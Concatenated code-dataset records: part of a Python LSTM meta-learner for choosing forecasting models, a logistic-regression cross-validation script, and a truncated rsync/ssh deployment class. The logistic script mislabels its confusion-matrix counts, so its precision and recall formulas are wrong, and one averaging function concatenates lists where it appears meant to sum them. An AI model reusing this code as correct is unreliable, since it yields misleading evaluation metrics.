results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n \n return results_vec_mse, results_vec_mape, results_vec_smape, arr_models\n \n### (a) Gloal Best Implementation\ndef Global_Best (dir_list, data_list, data_type):\n Models_Array_mse = [] \n Models_Array_mape = []\n Models_Array_smape = [] \n for data_name in data_list:\n for win_ind in os.listdir(dir_list):\n if '.DS_Store' not in win_ind:\n print(data_name)\n ##### Get Performance Matrix and Best Model Array for both Multi-variate and Uni-variate Datasets with a specific window\n if data_type == 'Uni-var':\n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n \n all_models_list = os.listdir(dir_list + win_ind + '/' + data_name) \n for model_name in all_models_list:\n df = pd.read_csv(dir_list + win_ind + '/' + data_name + '/' + model_name, error_bad_lines=False, header = None)\n 
results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1])\n \n best_model_dataset_index_mse = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape = results_vec_smape.index(min(results_vec_smape))\n \n \n ## Append Best Model for each dataset variable to the vector\n Models_Array_mse.append(best_model_dataset_index_mse)\n Models_Array_mape.append(best_model_dataset_index_mape)\n Models_Array_smape.append(best_model_dataset_index_smape)\n\n \n d_mse = defaultdict(int)\n for i in Models_Array_mse:\n d_mse[i] += 1\n result_mse = max(d_mse.items(), key=lambda x: x[1])\n \n d_mape = defaultdict(int)\n for i in Models_Array_mape:\n d_mape[i] += 1\n result_mape = max(d_mape.items(), key=lambda x: x[1])\n \n d_smape = defaultdict(int)\n for i in Models_Array_smape:\n d_smape[i] += 1\n result_smape = max(d_smape.items(), key=lambda x: x[1])\n \n return all_models_list[result_mse[0]], all_models_list[result_mape[0]], all_models_list[result_smape[0]]\n \n### Get Average Performance of Models across dataset cluster (Used for ISAC baseline)\ndef Get_Best_Avg_Model_Dataset(data_cluster, win_res_dir_name, data_type):\n \n results_vec_mse_avg = [0] * 322\n results_vec_mape_avg = [0] * 322\n results_vec_smape_avg = [0] * 322\n \n for data_name in data_cluster:\n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n \n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n results_vec_mse_avg += results_vec_mse\n results_vec_mape_avg += results_vec_mape\n results_vec_smape_avg += results_vec_smape \n \n best_model_dataset_index_mse_avg = results_vec_mse_avg.index(min(results_vec_mse_avg))\n best_model_dataset_index_mape_avg = results_vec_mape_avg.index(min(results_vec_mape_avg))\n best_model_dataset_index_smape_avg = results_vec_smape_avg.index(min(results_vec_smape_avg))\n \n \n return arr_models[best_model_dataset_index_mse_avg], arr_models[best_model_dataset_index_mape_avg], arr_models[best_model_dataset_index_smape_avg] \n\n### Get the best model for specific dataset (Used for ALgros baseline)\ndef Get_Best_Model_Dataset(data_name, win_res_dir_name, data_type):\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n arr_models.insert(0,'Dataset')\n \n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n \n best_model_dataset_index_mse = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape = results_vec_smape.index(min(results_vec_smape))\n \n \n return arr_models[best_model_dataset_index_mse + 1], arr_models[best_model_dataset_index_mape + 1], arr_models[best_model_dataset_index_smape + 1]\n \n#### 
Get Model Files list from a dataset directory\ndef Get_Model_Files_List(win_res_dir_name, data_type):\n \n dir_datasets_name = os.listdir(win_res_dir_name) \n for dir_name in dir_datasets_name:\n \n if '.DS_Store' in dir_name:\n continue\n \n if data_type == 'Uni-var':\n all_models_list = os.listdir(win_res_dir_name+'/'+dir_name)\n \n else:\n all_datasets_list = os.listdir(win_res_dir_name+'/'+dir_name) \n \n for file_name in all_datasets_list:\n if '.DS_Store' not in file_name:\n all_models_list = os.listdir(win_res_dir_name+'/'+dir_name+'/'+file_name) \n \n \n return all_models_list \n\n#### Draw and Save Histogram for the best models\ndef Histogram_plot_save(window_best_models_arr):\n \n _ = plt.hist(window_best_models_arr, bins= 'auto', density = True) # arguments are passed to np.histogram\n plt.title(\"Histogram of Best Models for Training Dataset\", fontsize=12)\n plt.xlabel(\"Forecasting Model Index\", fontsize=12)\n plt.ylabel(\"Probability of being Best Model\", fontsize=12)\n plt.xticks(fontsize=12)\n plt.yticks(fontsize=12)\n plt.tick_params(axis='both', which='minor', labelsize=12)\n plt.savefig('hist_best_models.eps', format='eps')\n plt.show()\n \ndef chunks(l, n):\n n = max(1, n)\n return [l[i:i+n] for i in range(0, len(l), n)]\n\n### Get Difference between two lists\ndef Diff(li1, li2): \n return (list(set(li1) - set(li2)))\n\n#### Divide the datasets into 5 folds for training and testing \ndef Divide_Dataset_Folds(n_folds, datasets_dir_list):\n \n train_folds_list = []\n test_folds_list = []\n\n length = int(len(datasets_dir_list)/ n_folds) #length of each fold\n folds = []\n for i in range(n_folds-1):\n folds += [datasets_dir_list[i*length:(i+1)*length]]\n folds += [datasets_dir_list[4*length:len(datasets_dir_list)]]\n \n print(folds)\n \n for fold in folds: \n train_folds_list.append(Diff(datasets_dir_list, fold))\n test_folds_list.append(fold)\n\n\n return train_folds_list, test_folds_list \n \n\nif __name__ == '__main__':\n \n n_folds = 5\n PCA_option = 'Yes' #Yes\n n_components = 3 ## If PCA_option is Yes, the n_components\n \n ## Folds for MV datasets\n mv_dir = 'results_all_mv/Multi-variate_first_win/'\n dir_mv_list = os.listdir(mv_dir)\n dir_mv_list.remove('.DS_Store')\n train_folds_list_mv, test_folds_list_mv = Divide_Dataset_Folds(n_folds, dir_mv_list) ## Division of folds by dataset names\n \n ''' \n ## Folds for UV datasets\n uv_dir_1 = 'results_all_mv/Multi-variate_first_win/'\n uv_dir_2 = 'results_all_mv/Multi-variate_second_win'\n uv_dir_3 = 'results_all_mv/Multi-variate_third_win'\n dir_uv_list = os.listdir(uv_dir_1)\n dir_uv_list.remove('.DS_Store')\n train_folds_list_uv, test_folds_list_uv = Divide_Dataset_Folds(n_folds, dir_uv_list) ## Division of folds by dataset names\n \n \n #### Go across the folds and evaluate the different baselines and then average\n meta_feat_dir_1 = 'Meta-Features/Meta-Feat_first_win/Multi_Variate_Real_first_win/'\n meta_feat_dir_2 = 'Meta-Features/Meta-Feat_sec_win/Multi_Variate_Real_sec_win/'\n meta_feat_dir_3 = 'Meta-Features/Meta-Feat_third_win/Multi_Variate_Real_third_win/'\n \n '''\n \n #### Directories for perfromances results for all other windows \n uv_dir_1 = 'results_all_uv/Uni-variate_first_win/' \n uv_dir_2 = 'results_all_uv/Uni-variate_second_win'\n uv_dir_3 = 'results_all_uv/Uni-variate_third_win'\n dir_uv_list = os.listdir(uv_dir_1)\n dir_uv_list.remove('.DS_Store')\n train_folds_list_uv, test_folds_list_uv = Divide_Dataset_Folds(n_folds, dir_uv_list) ## Division of folds by dataset names\n \n #print('UV<<<<') 
#print(train_folds_list_uv) #print(test_folds_list_uv)\n \n \n #### Go across the folds and evaluate the different baselines and then average\n meta_feat_dir_1 = 'Meta-Features/Meta-Feat_first_win/Uni-Variate_first_win/'\n meta_feat_dir_2 = 'Meta-Features/Meta-Feat_sec_win/Uni-Variate_sec_win/'\n meta_feat_dir_3 = 'Meta-Features/Meta-Feat_third_win/Uni-Variate_third_win/'\n \n \n final_vec_all_folds = []\n cnt_k_all = 0\n train_time_vec = []\n \n for i in range(0, n_folds):\n \n \n train_X_mse = pd.DataFrame()\n test_X_mse = pd.DataFrame()\n train_Y_mse = pd.DataFrame()\n test_Y_mse = pd.DataFrame()\n predicted_mse = pd.DataFrame()\n \n train_Y_mape = []; train_Y_smape = []\n \n ### Extract Meta-Features\n ## (1) Train Meta-features\n meta_features_train_orig_1 = Get_Meta_Features (meta_feat_dir_1, train_folds_list_uv[i], 'Uni-var')\n meta_features_train_orig_2 = Get_Meta_Features (meta_feat_dir_2, train_folds_list_uv[i], 'Uni-var')\n meta_features_train_orig_3 = Get_Meta_Features (meta_feat_dir_3, train_folds_list_uv[i], 'Uni-var')\n \n meta_features_train_orig_par = meta_features_train_orig_1.append(meta_features_train_orig_2, ignore_index=True)\n meta_features_train_orig = meta_features_train_orig_par.append(meta_features_train_orig_3, ignore_index=True)\n \n ## Perform PCA for Training\n pca = PCA(n_components)\n pca.fit(meta_features_train_orig)\n meta_features_train_pca = pca.transform(meta_features_train_orig)\n #print(pca.explained_variance_ratio_)\n \n #print(meta_features_train_orig)\n #print(meta_features_train_pca)\n \n ## Normalize Features\n if PCA_option == 'No':\n meta_features_train = Normalize_feature(meta_features_train_orig, PCA_option)\n else: \n meta_features_train = Normalize_feature(meta_features_train_pca, PCA_option)\n \n print('Normalized Train Features')\n print(meta_features_train)\n \n ## (1) Test Meta-features\n meta_features_test_orig_1 = Get_Meta_Features (meta_feat_dir_1, test_folds_list_uv[i], 'Uni-var')\n meta_features_test_orig_2 = Get_Meta_Features (meta_feat_dir_2, test_folds_list_uv[i], 'Uni-var')\n meta_features_test_orig_3 = Get_Meta_Features (meta_feat_dir_3, test_folds_list_uv[i], 'Uni-var')\n \n meta_features_test_orig_par = meta_features_test_orig_1.append(meta_features_test_orig_2, ignore_index=True)\n meta_features_test_orig = meta_features_test_orig_par.append(meta_features_test_orig_3, ignore_index=True)\n \n ## Perform PCA for Testing\n pca = PCA(n_components)\n pca.fit(meta_features_test_orig)\n meta_features_test_pca = pca.transform(meta_features_test_orig)\n #print(pca.explained_variance_ratio_)\n \n ## Normalize Features\n if PCA_option == 'No':\n meta_features_test = Normalize_feature(meta_features_test_orig, PCA_option)\n else: \n meta_features_test = Normalize_feature(meta_features_test_pca, PCA_option)\n \n print('Normalized Test Features') \n print(meta_features_test)\n \n \n ## (B) Time-Series Meta-learner \n j = 0\n for train_data_name in train_folds_list_uv[i]: ## Append all of the first window performances \n \n train_X_mse_1 = [];train_X_mse_2 = [];train_X_mse_3 = []; \n train_Y_mse_1 = []; train_Y_mse_2 = [];train_Y_mse_3 = [];\n \n \n ## Collect Performances for that dataset\n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_1, 'Uni-var')\n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_2, 'Uni-var')\n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = 
Get_All_Model_Dataset(train_data_name, uv_dir_3, 'Uni-var') \n \n \n ## First Window History features and performances\n train_X_mse_1.extend(meta_features_train.iloc[j,:])\n train_X_mse_1.extend([0] * 322)\n if PCA_option == 'No':\n train_X_mse_1.extend([0] * meta_features_train_orig_2.shape[1])\n else:\n train_X_mse_1.extend([0] * n_components)\n train_X_mse_1.extend([0] * 322)\n print('TRAIN_X After first window')\n #print(len(train_X_mse_1))\n \n a_series = pd.Series(train_X_mse_1)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n #print(train_X_mse)\n \n print('TRAIN_Y After first window')\n train_Y_mse_1.extend(results_vec_mse_1)\n #print(len(train_Y_mse_1))\n \n ## Appending the first raw to the train_Y dataframe \n a_series = pd.Series(train_Y_mse_1)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n #print(train_Y_mse)\n \n \n ## Second Window History features and performances\n train_X_mse_2.extend(meta_features_train.iloc[j,:])\n train_X_mse_2.extend(results_vec_mse_1)\n if PCA_option == 'No':\n train_X_mse_2.extend([0] * meta_features_train_orig_2.shape[1])\n else:\n train_X_mse_2.extend([0] * n_components)\n train_X_mse_2.extend([0] * 322) \n print('TRAIN_X After second window')\n #print(len(train_X_mse_2))\n \n a_series = pd.Series(train_X_mse_2)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n #print(train_X_mse)\n \n ## Appending the second raw to the train_X dataframe \n train_Y_mse_2.extend(results_vec_mse_2)\n print('TRAIN_Y After second window')\n #print(len(train_Y_mse_2))\n \n a_series = pd.Series(train_Y_mse_2)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n #print(train_Y_mse)\n \n \n ## Third Window History features and performances\n train_X_mse_3.extend(meta_features_train.iloc[j,:])\n train_X_mse_3.extend(results_vec_mse_1)\n train_X_mse_3.extend(meta_features_train.iloc[j+len(train_folds_list_uv[i]),:])\n train_X_mse_3.extend(results_vec_mse_2)\n print('TRAIN_X After third window')\n #print(len(train_X_mse_3))\n \n ## Appending the third raw to the train_X dataframe \n a_series = pd.Series(train_X_mse_3)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n print(train_X_mse)\n \n \n ## Appending the third raw to the train_Y dataframe \n train_Y_mse_3.extend(results_vec_mse_3)\n print('TRAIN_Y After third window')\n #print(len(train_Y_mse_3))\n \n a_series = pd.Series(train_Y_mse_3)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n print(train_Y_mse)\n \n j += 1\n \n \n print(train_X_mse) \n print(train_Y_mse) \n \n # Fit Model for MSE Performance Metric \n #model_ts_mse = LinearRegression(positive = True) ## normalize = True \n #model_ts_mse = Ridge(alpha = 1.0)\n \n ## Start Time for Training\n start_time = time.time()\n \n \n ## Creating RNN to model TS model\n train_X_mse = np.array(train_X_mse)\n train_X_mse = np.reshape(train_X_mse, (train_X_mse.shape[0], train_X_mse.shape[1], 1)) \n \n \n model_ts_mse = Sequential()\n print(train_X_mse.shape[1])\n model_ts_mse.add(LSTM(units = 50, return_sequences = True, input_shape = (train_X_mse.shape[1], 1)))\n model_ts_mse.add(Dropout(0.2)) ## Drop Out Regularization\n ## Adding Three More LSTM Layers\n for p in [True, True, False]: # 2 layers\n model_ts_mse.add(LSTM(units = 50, return_sequences = p))\n model_ts_mse.add(Dropout(0.2))\n \n ## Adding the output layer\n print(train_Y_mse.shape[1]) \n model_ts_mse.add(Dense(units = train_Y_mse.shape[1]))\n \n ## Compiling the RNN \n model_ts_mse.compile(optimizer = 'adam', loss 
= 'mean_squared_error')\n \n ## Fitting the RNN \n model_ts_mse.fit(train_X_mse, train_Y_mse, epochs = 40, batch_size = 50)\n \n \n AFY_train_time_seconds = time.time() - start_time \n print('AF-Y Train Time: '+ str(AFY_train_time_seconds))\n \n train_time_vec.append(AFY_train_time_seconds) \n \n print('Train_Time_Vector_After_Fold ' + str(i))\n print(train_time_vec)\n \n #model_ts_mse.fit(train_X_mse, train_Y_mse)\n #print(model_ts_mse.coef_)\n #print(model_ts_mse.score(train_X_mse, train_Y_mse))\n \n \n ## Testing of Time-Series Meta-learner \n j = 0\n for test_data_name in test_folds_list_uv[i]: ## Append all of the first window performances \n \n test_X_mse_1 = [];test_X_mse_2 = [];test_X_mse_3 = []; \n test_Y_mse_1 = [];test_Y_mse_2 = [];test_Y_mse_3 = []; ## Actual Performances (Ground Truth)\n \n \n ## Collect Performances for that dataset\n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_1, 'Uni-var')\n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_2, 'Uni-var')\n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = Get_All_Model_Dataset(test_data_name, uv_dir_3, 'Uni-var') \n \n \n ## First Window History features and performances\n test_X_mse_1.extend(meta_features_test.iloc[j,:])\n test_X_mse_1.extend([0] * 322)\n if PCA_option == 'No':\n test_X_mse_1.extend([0] * meta_features_test_orig_2.shape[1])\n else:\n test_X_mse_1.extend([0] * n_components)\n \n test_X_mse_1.extend([0] * 322)\n \n a_series = pd.Series(test_X_mse_1)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n \n ## Ground Truth of the first window\n test_Y_mse_1.extend(results_vec_mse_1)\n a_series = pd.Series(test_Y_mse_1)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n \n ## Predict the First window performances\n #print(test_X_mse_1)\n #test_X_mse_1 = np.array(test_X_mse_1)\n #test_X_mse_1 = np.reshape(test_X_mse_1, (test_X_mse_1.shape[0], test_X_mse_1.shape[1], 1))\n \n #predicted_win_1 = model_ts_mse.predict([test_X_mse_1])\n\n #a_series = pd.Series(predicted_win_1[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n ## Second Window History features and performances\n test_X_mse_2.extend(meta_features_test.iloc[j,:])\n #test_X_mse_2.extend(predicted_win_1[0])\n test_X_mse_2.extend(results_vec_mse_1)\n if PCA_option == 'No':\n test_X_mse_2.extend([0] * meta_features_test_orig_2.shape[1])\n else:\n test_X_mse_2.extend([0] * n_components)\n test_X_mse_2.extend([0] * 322) \n \n ## Append to test_X dataframe\n a_series = pd.Series(test_X_mse_2)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n \n\n test_Y_mse_2.extend(results_vec_mse_2)\n \n a_series = pd.Series(test_Y_mse_2)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n \n ## Predict the second window performances\n print(test_X_mse_2)\n #test_X_mse_2 = np.array(test_X_mse_2)\n #test_X_mse_2 = np.reshape(test_X_mse_2, (test_X_mse_2.shape[0], test_X_mse_2.shape[1], 1)) \n \n #predicted_win_2 = model_ts_mse.predict([test_X_mse_2])\n #a_series = pd.Series(predicted_win_2[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n \n ## Third Window History features and performances\n test_X_mse_3.extend(meta_features_test.iloc[j,:])\n #test_X_mse_3.extend(predicted_win_1[0]) Predict everything from scratch\n test_X_mse_3.extend(results_vec_mse_1)\n 
test_X_mse_3.extend(meta_features_test.iloc[j+len(test_folds_list_uv[i]),:])\n test_X_mse_3.extend(results_vec_mse_2)\n #test_X_mse_3.extend(predicted_win_2[0])\n \n ## Appending the third raw to the test_X dataframe \n a_series = pd.Series(test_X_mse_3)\n test_X_mse = test_X_mse.append(a_series, ignore_index=True)\n print(test_X_mse)\n \n \n ## Predicting Third window performances using time-series regression model\n #test_X_mse_3 = np.array(test_X_mse_3)\n #test_X_mse_3 = np.reshape(test_X_mse_3, (test_X_mse_3.shape[0], test_X_mse_3.shape[1], 1))\n \n #predicted_win_3 = model_ts_mse.predict([test_X_mse_3])\n #a_series = pd.Series(predicted_win_3[0])\n #predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n \n \n \n ## Appending the third raw to the test_Y dataframe \n test_Y_mse_3.extend(results_vec_mse_3)\n \n a_series = pd.Series(test_Y_mse_3)\n test_Y_mse = test_Y_mse.append(a_series, ignore_index=True)\n print(test_Y_mse)\n \n #print('Test Features')\n #print(test_X_mse)\n \n test_X_mse = np.array(test_X_mse)\n test_X_mse = np.reshape(test_X_mse, (test_X_mse.shape[0], test_X_mse.shape[1], 1))\n \n ## Start Time for Inference\n start_time = time.time()\n \n predicted_win = model_ts_mse.predict(test_X_mse)\n print(predicted_win)\n print(predicted_win.shape)\n print(predicted_win[0])\n a_series = pd.Series(predicted_win[0])\n predicted_mse = predicted_mse.append(a_series, ignore_index=True)\n print(predicted_mse)\n \n \n \n ## Get the best model index from Autoforecast time-series meta-learner \n predicted_mse['MinColumnID']= predicted_mse.idxmin(axis=1)\n test_Y_mse['MinColumnID']= test_Y_mse.idxmin(axis=1)\n \n \n \n print('Predicted ........')\n print(predicted_mse)\n #predicted_mse.to_csv('Predicted_MSE_Fold_No_' + str(i) + '.csv') \n \n print('Actual..........')\n print(test_Y_mse)\n #test_Y_mse.to_csv('Actual_MSE_Fold_No_' + str(i) + '.csv') \n\n \n ## Inference by getting the actual performance of the chosen model index by the time-series regression (i.e., the one with the least predicted output) \n K = 1\n a_vec = []\n cnt = 0\n for j in range(0, len(test_Y_mse)):\n res = sorted(range(len(test_Y_mse.iloc[j,:-1])), key = lambda sub: test_Y_mse.iloc[j,:-1][sub])[:K]\n #print(test_Y_mse.iloc[j,-1])\n print(res)\n print(np.argmin(predicted_win[j]))\n if np.argmin(predicted_win[j]) in res: #np.argmin(predicted_win[j]):\n cnt += 1\n #print(cnt)\n final_vec_all_folds.append(test_Y_mse.iloc[j,np.argmin(predicted_win[j])]) #predicted_mse.iloc[j,-1]])\n print(cnt)\n \n print('Fold No. 
' + str(i))\n \n cnt_k_all += cnt\n print('Count-k: ' + str(cnt_k_all))\n print('Rank-k-Acc: ' + str((cnt_k_all / (len(test_Y_mse) * n_folds))))\n \n #break \n #print(final_vec_all_folds) \n \n ## Estimate Inference Time\n #AF_best_inference_run_time_seconds = time.time() - start_time \n #print('AutoForecast Inference Time: '+ str(AF_best_inference_run_time_seconds))\n \n \n #print('Performance Vector after all folds for time-series regression')\n \n print(final_vec_all_folds)\n print(Average_val(final_vec_all_folds)) \n \n \n ''' \n # (A) Define general meta-learning model\n \n #print(train_folds_list_uv[i]) \n \n \n \n train_X = meta_features_train\n train_Y_mse = []; train_Y_mape = []; train_Y_smape = []\n\n #df_meta_feat = df_meta_feat.fillna(0)\n \n ## Get the output vector for each dataset in that fold \n for train_data_name in train_folds_list_uv[i]: ## Append all of the first window performances \n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_1, 'Uni-var')\n train_Y_mse.append(results_vec_mse_1); train_Y_mape.append(results_vec_mape_1); train_Y_smape.append(results_vec_smape_1)\n \n for train_data_name in train_folds_list_uv[i]: ## Append all of the second window performances \n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_2, 'Uni-var')\n train_Y_mse.append(results_vec_mse_2); train_Y_mape.append(results_vec_mape_2); train_Y_smape.append(results_vec_smape_2)\n \n for train_data_name in train_folds_list_uv[i]: ## Append all of the third window performances \n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_3, 'Uni-var')\n train_Y_mse.append(results_vec_mse_3); train_Y_mape.append(results_vec_mape_3); train_Y_smape.append(results_vec_smape_3)\n \n ## Repeating the performance matrix to the multiple time windows\n #train_Y_mse = np.repeat(train_Y_mse, 3, axis=0)\n #train_Y_mape = np.repeat(train_Y_mape, 3, axis=0)\n #train_Y_smape = np.repeat(train_Y_smape, 3, axis=0)\n \n print (np.array(train_Y_mape).shape)\n \n \n # Fit Model for MSE Performance Metric \n model_mse = LinearRegression()\n model_mse.fit(train_X, train_Y_mse)\n print(model_mse.coef_)\n print(model_mse.score(train_X, train_Y_mse))\n \n \n # Fit Model for MAPE Performance Metric \n train_Y_mape = np.array(train_Y_mape)\n train_Y_mape[np.isinf(train_Y_mape)] = 100 ## Replacing infinity values with high number\n train_Y_mape[np.isnan(train_Y_mape)] = 100 ## Replacing NAN values with high number \n\n model_mape = LinearRegression()\n model_mape.fit(train_X, train_Y_mape)\n print(model_mape.coef_)\n print(model_mape.score(train_X, train_Y_mape))\n \n # Fit Model for sMAPE Performance Metric \n train_Y_smape = np.array(train_Y_smape)\n train_Y_smape[np.isinf(train_Y_smape)] = 100 ## Replacing infinity values with high number\n train_Y_smape[np.isnan(train_Y_smape)] = 100 ## Replacing NAN values with high number\n \n model_smape = LinearRegression()\n model_smape.fit(train_X, train_Y_smape)\n print(model_smape.coef_)\n print(model_smape.score(train_X, train_Y_smape))\n \n # Make a Prediction\n test_X = meta_features_test\n yhat_mse = model_mse.predict(test_X)\n yhat_mape = model_mape.predict(test_X) \n yhat_smape = model_smape.predict(test_X)\n \n # summarize prediction\n print(yhat_mse[0])\n print(yhat_mse)\n print(np.array(yhat_mse).shape)\n \n for test_idx in range(len(test_folds_list_uv[i])):\n \n ## Get 
the best model index from original data\n results_vec_mse, results_vec_mape, results_vec_smape, arr_models = Get_All_Model_Dataset(test_folds_list_uv[i][test_idx], uv_dir, 'Uni-var') \n \n best_model_dataset_index_mse_orig = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape_orig = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape_orig = results_vec_smape.index(min(results_vec_smape))\n \n \n ## Get the best model index from Autoforecast general meta-learner \n minimum_mse = np.min(yhat_mse[test_idx])\n best_model_dataset_index_mse = np.where(yhat_mse[test_idx] == minimum_mse)\n print('Autoforecast: ' + arr_models[best_model_dataset_index_mse[0][0]] + '(' + str(results_vec_mse[best_model_dataset_index_mse[0][0]]) + ')' + ' orig: ' + arr_models[best_model_dataset_index_mse_orig] + '(' + str(results_vec_mse[best_model_dataset_index_mse_orig]) + ')' )\n \n minimum_mape = np.min(yhat_mape[test_idx])\n best_model_dataset_index_mape = np.where(yhat_mape[test_idx] == minimum_mape)\n \n minimum_smape = np.min(yhat_smape[test_idx])\n best_model_dataset_index_smape = np.where(yhat_smape[test_idx] == minimum_smape)\n \n \n \n print('Fold Finished ............') \n \n #break\n '''\n\n \n\n\n\n","sub_path":"src/Meta-Learner/Autoforecast_Train_timeseries_RNN.py","file_name":"Autoforecast_Train_timeseries_RNN.py","file_ext":"py","file_size_in_byte":35271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440379418","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nfeature_selected = ['Danceability', \r\n 'Energy', \r\n 'Speechiness', \r\n 'Acousticness', \r\n 'Instrumentalness', \r\n 'Liveness',\r\n 'Valence',\r\n 'Loudness',\r\n 'Tempo',\r\n 'Artist_Score']\r\n\r\nData = pd.read_excel('E:/Desktop/Data/feature_complete_normalized_1990_2019.xlsx')\r\nkf = KFold(n_splits=10, shuffle=True)\r\nkf.get_n_splits(Data)\r\n\r\nstore_train = []\r\nstore_test =[]\r\nstore_train_p = []\r\nstore_test_p =[]\r\nstore_train_r = []\r\nstore_test_r =[]\r\nfor train_index, test_index in kf.split(Data):\r\n train_set = Data.loc[train_index,]\r\n Xtrain = np.array(train_set[feature_selected])\r\n Ytrain = np.array(train_set['label'], dtype=float)\r\n test_set = Data.loc[test_index,]\r\n Xtest = np.array(test_set[feature_selected])\r\n Ytest = np.array(test_set['label'], dtype=float)\r\n #Unpenalized Logistic Regression \r\n clf = LogisticRegression(solver='lbfgs', C=np.inf) \r\n clf.fit(Xtrain, Ytrain)\r\n train_predict = clf.predict(Xtrain)\r\n train_accuracy = (train_predict==Ytrain).mean()\r\n test_predict = clf.predict(Xtest)\r\n test_accuracy = (test_predict==Ytest).mean()\r\n store_train.append(train_accuracy)\r\n store_test.append(test_accuracy)\r\n tp1 = sum(((train_predict == 1) & (Ytrain == 1)) * 1)\r\n fp1 = sum(((train_predict == 0) & (Ytrain == 1)) * 1)\r\n tn1 = sum(((train_predict == 1) & (Ytrain == 0)) * 1)\r\n fn1 = sum(((train_predict == 0) & (Ytrain == 0)) * 1)\r\n train_precision = tp1 / (tp1 + fp1)\r\n train_recall = tp1 / (tp1 + fn1)\r\n store_train_p.append(train_precision)\r\n store_train_r.append(train_recall)\r\n tp2 = sum(((test_predict == 1) & (Ytest == 1)) * 1)\r\n fp2 = sum(((test_predict == 0) & (Ytest == 1)) * 1)\r\n tn2 = sum(((test_predict == 1) & (Ytest == 0)) * 1)\r\n fn2 = sum(((test_predict == 0) & (Ytest == 0)) * 1)\r\n test_precision = tp2 / (tp2 + fp2)\r\n test_recall = tp2 
/ (tp2 + fn2)\r\n store_test_p.append(test_precision)\r\n store_test_r.append(test_recall)\r\n\r\naverge_train_accuracy = np.mean(store_train)\r\nprint('Train:',averge_train_accuracy)\r\naverge_test_accuracy = np.mean(store_test)\r\nprint('Test:',averge_test_accuracy)\r\naverge_train_precision = np.mean(store_train_p)\r\nprint(\"Train precision:\",averge_train_precision)\r\naverge_test_precision = np.mean(store_test_p)\r\nprint(\"Test precision:\",averge_test_precision)\r\naverge_train_recall = np.mean(store_train_r)\r\nprint(\"Train recall:\",averge_train_recall)\r\naverge_test_recall = np.mean(store_test_r)\r\nprint(\"Test recall:\",averge_test_recall)\r\n\r\n","sub_path":"logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371307149","text":"from asyncinit import asyncinit\nfrom erund.utils import ssh, cmd, cmdout\nfrom .platform import Platform\nGIT = ['git']\nRSYNC = ['rsync']\n\n\n@asyncinit\nclass Linux(Platform):\n async def __init__(self, id_, hostuser, host, command):\n await super().__init__(id_)\n self.rcwd = f'/home/{hostuser}/{self.id}'\n self.hostuser = hostuser\n self.host = host\n self.command = command\n self.pidfile = f'{self.rcwd}/{self.id}.pid'\n\n async def upload(self):\n rootdir = await cmdout(GIT + ['rev-parse', '--show-toplevel'])\n res = await cmdout(RSYNC + ['-r', '-a', '-e', 'ssh', '--delete', '--exclude', 'build', '--exclude', 'devel', f'{rootdir}/', f'{self.hostuser}@{self.host}:{self.rcwd}/'])\n print(res)\n\n async def stop(self):\n res = await ssh(self.host, self.hostuser, f'if [ -f {self.pidfile} ]; then (pkill 